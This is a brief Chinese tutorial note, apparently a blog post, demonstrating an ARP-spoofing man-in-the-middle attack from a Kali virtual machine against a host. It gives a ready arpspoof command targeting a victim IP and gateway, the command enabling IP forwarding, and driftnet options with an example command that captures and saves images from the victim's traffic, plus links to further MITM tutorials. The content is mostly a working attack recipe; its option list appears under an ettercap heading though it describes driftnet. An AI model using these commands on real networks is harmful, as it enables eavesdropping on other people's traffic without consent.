ARP攻击——嗅探获取图片(KALI虚拟机+宿主演示版)

1、虚拟机弄成桥接模式的

 

 

 

arpspoof -i 网卡 -t 目标ip  网关

开启IP转发:echo 1 >/proc/sys/net/ipv4/ip_forward

 

最后获取图片的话,要先将ARP停止了

 

ettercap

● -i 监听网卡
● -b 声音提醒
● -a 保存图片(这样的话图片不会显示在窗口)
● -d 图片保存目录,例:driftnet -i wlan0 -b -a -d /pic 

 

 

 

https://blog.csdn.net/zc19930620/article/details/61642372

 

kali中ARP欺骗与MITM(中间人攻击) (一)  https://blog.csdn.net/ysynhtt/article/details/39996933

kali中ARP欺骗与MITM(中间人攻击)(二)   https://blog.csdn.net/ysynhtt/article/details/39997243

你可能感兴趣的:(ARP攻击——嗅探获取图片(KALI虚拟机+宿主演示版))